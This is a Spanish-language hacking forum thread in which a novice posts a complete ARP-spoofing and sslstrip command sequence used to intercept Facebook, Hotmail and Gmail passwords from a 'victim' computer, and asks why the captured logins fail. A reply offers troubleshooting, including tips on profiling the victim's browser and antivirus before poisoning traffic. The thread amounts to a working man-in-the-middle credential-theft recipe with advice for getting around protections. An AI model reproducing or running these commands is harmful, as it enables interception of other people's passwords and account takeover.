Autor
|
Tema: Se bloquean algunas poaginas cuando snifo la contrasena con sslstrip (Leído 2,981 veces)
|
K4rl0sh
Desconectado
Mensajes: 2
|
Hola a todos
Soy nuevo en el foro y un muy novato en esto, asi que espero que me podais aclalar algunas dudas.
Estoy haciendo pruebas en mi red. Tengo un ordenador atacante con ubuntu donde usaba ettercap pero lo deje porque me bloqueaba mucho el ordenador victima, asi que buscando por internet llegue a un post de este foro donde le pasaba lo mismo a un forero y lo que hacia es
echo 1 > /proc/sys/net/ipv4/ip_forward
(arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}) arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
(Hasta aqui es lo que hacia con ettercap)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -w miarchivo
tail -f miarchivo * (para ver las pass en el mismo momento de la captura)
Esto me funciona bastante bien pero cuando meto las contrasenas en el ordenador victima veo que la pagina de facebook entra pero no accede a los contenidos y la de hotmail me pide la contrasena en un bucle infinito pero nunca entra. Me imagino que sera por el sslstrip al cambiar https por http.
Esto es normal? y si es asi se puede evitar?
Otra cosa es que con gmail ayer capturaba las pass y hoy por mas que la introduzco en el ordenador victima no me las captura. Es mas si activo el wireshark no veo apenas movimientos de esta pagina. Esto a que se puede deber?
Gracias y un saludo
|
|
|
En línea
|
|
|
|
Sh4k4
Desconectado
Mensajes: 965
xMHT
|
que version usas? usas la ultima? hay bugs!! si los hay como el de carga de youtube habra que checarlo o arreglarlo a mano si el colega moxie no lo ha hecho.... no olvides los navegadores y sus funciones anti, antivirus, firewalls y addons que ya forzan el https y demas anti jugadas phishing... primero snifea algo de tiempo y ve que trafico que servidores asi te daras algo de idea de que AV opera y que navegador o hasta donde quizas debas envenenar.... para lograr tu objetivo.
|
|
« Última modificación: 8 Mayo 2013, 02:38 am por Sh4k4 »
|
En línea
|
|
|
|
K4rl0sh
Desconectado
Mensajes: 2
|
Muchas gracias por responder.
Uso la version 0.9 de sslstrip, que creo que es la ultima (al menos es la que esta en el centro de software). Es esta la que tiene bugs? Deberia instalar otra version entonces?
Por desgracia, yo no tengo los conocimientos para arreglar eso a mano...
En cuanto al ordenador victima tiene instalado ubuntu 12.04 y el navegador es firefox y que yo sepa no lleva ningun addon que fuercen el https.. Tampoco tiene antivirus..
Aunque lo que mas uso es ubuntu, tengo mas sistemas operativos instalados en ellos asi que probare tambien con Windows
|
|
|
En línea
|
|
|
|
Sh4k4
Desconectado
Mensajes: 965
xMHT
|
intenta versiones anteriores, la 0.9 me parece si esta afectada por el bug de carga de youtube asi que... de que funciona funciona, ahora intenta emular un pc victim con las mismas caracteristicas y veras que falla.
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
por que cuando saco la clave de una wep algunas cargan datas muy rapido y
Hacking Wireless
|
titan711
|
1
|
2,764
|
2 Enero 2011, 16:53 pm
por kupu88
|
|
|
SSLSTRIP
« 1 2 3 »
Hacking
|
BeLGaRioN
|
20
|
14,730
|
9 Diciembre 2011, 11:33 am
por D_pit_88
|
|
|
Acabo de instalar back track 5 y cuando reinicio me pide contraseña
Hacking
|
rj12
|
3
|
4,533
|
19 Diciembre 2011, 03:29 am
por koly
|
|
|
Las copias no activadas de Windows 8.1 bloquean algunas características
Noticias
|
wolfbcn
|
0
|
1,555
|
21 Octubre 2013, 14:13 pm
por wolfbcn
|
|
|
¿Cómo bloquean algunas páginas esto?
Desarrollo Web
|
e
|
5
|
2,444
|
10 Octubre 2019, 13:06 pm
por @XSStringManolo
|
|